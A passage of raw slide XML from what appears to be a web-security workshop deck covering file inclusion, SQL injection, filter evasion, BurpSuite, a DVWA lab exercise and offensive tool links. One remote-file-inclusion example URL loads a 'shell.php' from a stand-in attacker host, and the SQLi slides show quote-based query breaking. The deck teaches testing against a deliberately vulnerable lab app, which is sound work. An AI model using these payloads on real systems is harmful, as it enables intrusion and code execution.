            <a:off x="2043550" y="2417350"/>
            <a:ext cx="2390400" cy="2840400"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173" name="Google Shape;173;g308c0d0a792_0_301"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811401" y="2552950"/>
            <a:ext cx="2569200" cy="2569200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="174" name="Google Shape;174;g308c0d0a792_0_301"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="14410" r="14389" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7758038" y="2441038"/>
            <a:ext cx="2980500" cy="2793000"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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3555b638ead_0_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55" name="Google Shape;355;g3555b638ead_0_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56" name="Google Shape;356;g3555b638ead_0_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7" name="Google Shape;357;g3555b638ead_0_1"/>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Local|Remote File Inclusion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Remote file inclusion is similar to LFI but instead of the file being from a local source, it can be pulled from an attacker controlled location. You can achieve RCE with this method easily.</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http[://]victim[.]com[/]gallery?photo=http[://]cdn[.]victim[.]com[/]cat[.]jpg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http[://]victim[.]com[/]gallery?photo=http[://]attacker.com[/]shell.php</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Google Shape;358;g3555b638ead_0_1"/>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LFI/RFI</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552b0b153c_0_21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65" name="Google Shape;365;g3552b0b153c_0_21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66" name="Google Shape;366;g3552b0b153c_0_2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7" name="Google Shape;367;g3552b0b153c_0_211"/>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Structured Query Language Injection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A lot of web apps have a database, it’s usually some form of SQL database (MySQL etc). Could potentially be a NoSQL database such as MongoDB.</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SQLi occurs when user input is directly passed into an SQL query without sanitisation or preparing the statement. For example:</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“SELECT password FROM users WHERE username=’$_POST[“username”]’”</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The username parameter from the form is passed directly to the SQL query</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Google Shape;368;g3552b0b153c_0_211"/>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SQLi/NoSQLi</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3555b638ead_0_1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75" name="Google Shape;375;g3555b638ead_0_1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76" name="Google Shape;376;g3555b638ead_0_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7" name="Google Shape;377;g3555b638ead_0_10"/>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Structured Query Language Injection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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>“SELECT password FROM users WHERE username=’$_POST[“username”]’”</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br>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>Lets say we input admin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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>“SELECT password FROM users WHERE username=’admin’”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What if we do admin’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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>“SELECT password FROM users WHERE username=’admin’’”</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It’s subtle but now the query will not complete correctly. Using ‘ is a good way of finding SQLi vulns.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Tools such as SQLmap and Ghauri can be used to automate this (will show you)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Google Shape;378;g3555b638ead_0_10"/>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SQLi/NoSQLi</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5580689e99_0_1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85" name="Google Shape;385;g35580689e99_0_1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86" name="Google Shape;386;g35580689e99_0_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87" name="Google Shape;387;g35580689e99_0_11"/>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Potentially web apps may implement some form of filter or WAF that prevents these attacks even though the app is vulnerable to them.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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t> has a great list of bypasses, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>PayloadAllTheThings</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t> does as well.</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Lets come up with some payloads (practical demo)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Google Shape;388;g35580689e99_0_11"/>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Filter Evasion</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308c0d0a792_0_352"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2130275" y="4854582"/>
            <a:ext cx="1288500" cy="957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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;g308c0d0a792_0_352"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2837575" y="1625837"/>
            <a:ext cx="2687400" cy="1026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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="396" name="Google Shape;396;g308c0d0a792_0_35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97" name="Google Shape;397;g308c0d0a792_0_352"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4596000" y="174975"/>
            <a:ext cx="3000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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Spectral"/>
                <a:ea typeface="Spectral"/>
                <a:cs typeface="Spectral"/>
                <a:sym typeface="Spectral"/>
              </a:rPr>
              <a:t>Your turn!</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="4800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Spectral"/>
              <a:ea typeface="Spectral"/>
              <a:cs typeface="Spectral"/>
              <a:sym typeface="Spectral"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398;g308c0d0a792_0_352"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1679875" y="1098375"/>
            <a:ext cx="9998700" cy="412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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Task 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> Install DVWA</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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>sudo apt update &amp;&amp; sudo apt install docker-compose docker</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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>it clone https://github.com/digininja/DVWA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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>d DVWA/</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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>udo docker-compose up -d</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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Task 2: Login to DVWA ( you can probably guess the creds)</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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Task 3: Set the difficulty to Low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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Task 4: Try some of the attacks!</a:t>
            </a:r>
            <a:endParaRPr sz="2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352a53ec5cb_0_198"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2130275" y="4854582"/>
            <a:ext cx="1288500" cy="957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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Google Shape;405;g352a53ec5cb_0_198"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2837575" y="1625837"/>
            <a:ext cx="2687400" cy="1026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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="406" name="Google Shape;406;g352a53ec5cb_0_19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7" name="Google Shape;407;g352a53ec5cb_0_198"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4596000" y="0"/>
            <a:ext cx="3000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lang="en-GB" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Spectral"/>
                <a:ea typeface="Spectral"/>
                <a:cs typeface="Spectral"/>
                <a:sym typeface="Spectral"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="4800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Spectral"/>
              <a:ea typeface="Spectral"/>
              <a:cs typeface="Spectral"/>
              <a:sym typeface="Spectral"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;g352a53ec5cb_0_198"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1337450" y="1140100"/>
            <a:ext cx="11823900" cy="457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GB" sz="2800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.thehacker.recipes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://book.hacktricks.wiki/en/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://sqlmap.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://github.com/r0oth3x49/ghauri</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://github.com/swisskyrepo/PayloadsAllTheThings</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://owasp.org/www-project-top-ten/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://github.com/ticarpi/jwt_tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>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GB" sz="2800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://github.com/Paradoxis/Flask-Unsign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2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52a53ec5cb_0_16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181" name="Google Shape;181;g352a53ec5cb_0_16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182" name="Google Shape;182;g352a53ec5cb_0_16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3" name="Google Shape;183;g352a53ec5cb_0_164"/>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We looked at beginner web stuff earlier in the year (powerpoint on GitHub if you need a refresher)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="4572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That was more of a general “Here is the kind of stuff to look for” rather than an “Here are some vulns and how to exploit them”</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="4572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It is important to note, not all vulnerabilities are equal and take different approaches to exploit them.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="4572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This takes time and research, especially for the practical if you can’t do it straight away, research. Use the tools and utilities i’ll show you and you’ll get it eventually.</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;g352a53ec5cb_0_164"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3709800" y="339650"/>
            <a:ext cx="4772400" cy="994500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>Intermediate / Advanced web</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2300" u="none" cap="none" strike="noStrike">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552b0b153c_0_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191" name="Google Shape;191;g3552b0b153c_0_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192" name="Google Shape;192;g3552b0b153c_0_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3" name="Google Shape;193;g3552b0b153c_0_6"/>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BurpSuite is the swiss army knife of web attacks</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="4572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Made by PortSwigger (they also do a very good Web Security Academy, you should definitely check it out)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="4572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It has all the tools you need to make your life easier doing a web app test</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;g3552b0b153c_0_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3709800" y="339650"/>
            <a:ext cx="4772400" cy="994500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>First things first, BurpSuite</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2300" u="none" cap="none" strike="noStrike">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2"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="195" name="Google Shape;195;g3552b0b153c_0_6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9811975" y="0"/>
            <a:ext cx="2547650" cy="2547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552b0b153c_0_1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02" name="Google Shape;202;g3552b0b153c_0_1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03" name="Google Shape;203;g3552b0b153c_0_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4" name="Google Shape;204;g3552b0b153c_0_17"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;g3552b0b153c_0_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3709800" y="339650"/>
